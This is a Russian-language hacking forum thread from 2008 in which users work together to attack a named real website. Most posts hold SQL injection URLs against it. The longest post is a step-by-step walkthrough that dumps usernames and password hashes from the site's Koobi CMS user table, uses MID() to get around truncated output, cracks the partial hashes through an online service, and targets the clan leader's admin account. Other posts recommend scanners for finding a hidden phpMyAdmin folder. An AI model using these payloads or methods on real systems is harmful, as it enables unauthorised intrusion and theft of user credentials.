 |
|
18.06.2008, 05:17
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
кстати версия мускула не 4, а 5... но доступа к information_schema юзверь не имеет...
Код:
http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+information_schema.tables/*
|
|
|
18.06.2008, 07:36
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
На выделеном сервере установлен phpmyadmin, как его можно найти, при условии, что папка переименова?
Существуют какие-нибудь сканеры?
|
|
|
|
18.06.2008, 07:46
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Ну а как ты его найдёшь?
_https://forum.antichat.ru/threadnav40031-1-10.html Сканер.
Или поищи скрипт nikto.pl
|
|
|
|
18.06.2008, 07:50
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Попробую. Спасибо.
|
|
|
|
18.06.2008, 09:02
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от sabe
http://darkbrotherhood.ru/index.php?area=1+union+select+password,2,3,4,5,6+f rom+mysql.user/*
кстати по этому запросу говорит не то что нет доступа к базе... а то что базы не существует.. просто запрос неправельный..
Код:
http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+mysql.users/*
вот тут реально говорит что доступа к таблице нет...
|
|
|
|
18.06.2008, 11:41
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
gisTy, во-первых запрос правильный, во-вторых Access denied for user 'darkbrot_mysql'@'%' to database 'mysql' переводица как Доступ запрещен бла-бла-бла, а Doesn't exist - не существует.
|
|
|
|
18.06.2008, 13:00
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Сообщение от Ch3ck
Ну а как ты его найдёшь?
_https://forum.antichat.ru/threadnav40031-1-10.html Сканер.
Или поищи скрипт nikto.pl
nicto.pl - для cgi. Он не подходит. Скрипты не помогли
Пытаюсь загрузить через думпер, пишет 500 ошибку.
|
|
|
|
18.06.2008, 15:13
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
сори ступил... эх матан матан... не суждено мне его было сегодня сдеать...
|
|
|
|
18.06.2008, 15:25
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Как подкл к Postgresql ?) и что там можно надыбать?) Точнее я нашол уязв она сообщ что моно приконектиться
|
|
|
|
18.06.2008, 16:46
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
2 diznt, 2 gisTy, 2 sabe
По поводу сайта http://darkbrotherhood.ru
ЦМС koobi.
Версия мускула 4.1.22 (ну и ясно что никакой информатион_схемы нету)
Дырок хватает. Все что я нашел вели только к посимвольному бруту, кроме одной и вот она интересна раскруткой.
Дыра в форуме вот тут
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,11,version() ,13/*
Вроде все нормально, но...
Качаем koobi смотрим таблицы, и колонки (я скачал немного не ту версию, но догадался с префиксом)
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,uname,pass,1 3+from+k_user/*
выдет странную картину - имена и пароли (хеши) видны не полностью.
Юзаем функции работы со строками в мускуле, я взял MID()
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(email,1, 8),MID(pass,1,8),13+from+k_user/*
выдал то что нужно 
Восьмерку тут MID(pass,1,8) подобираем опытным путем (интересно почему там 8 )
Дальше думаю понятно, меняем 1 так что бы увидеть всю строку целиком.
НО, хеш можно получать и не весь, вполне хватит первых восьми символов, с ними идем сюда http://hashcracking.info ,
выбираем поиск по маске и получаем пасс 
У этой ЦМС в админке бывает авторизация по мылу, но тут по логину юзера. Его находим вот тут (на случай логина больше 8 символов)
http://darkbrotherhood.ru/index.php?area=1&p=static&page=sostav (Глава клана)
Поэтому последний запрос вот такой
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(uname,1, 8),MID(pass,1,8),13+from+k_user+where+uname=CHAR(6 8,97,114,107,101,108,118,101)/*
...
Было интересно исследовать. Может кто найдет другой путь? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
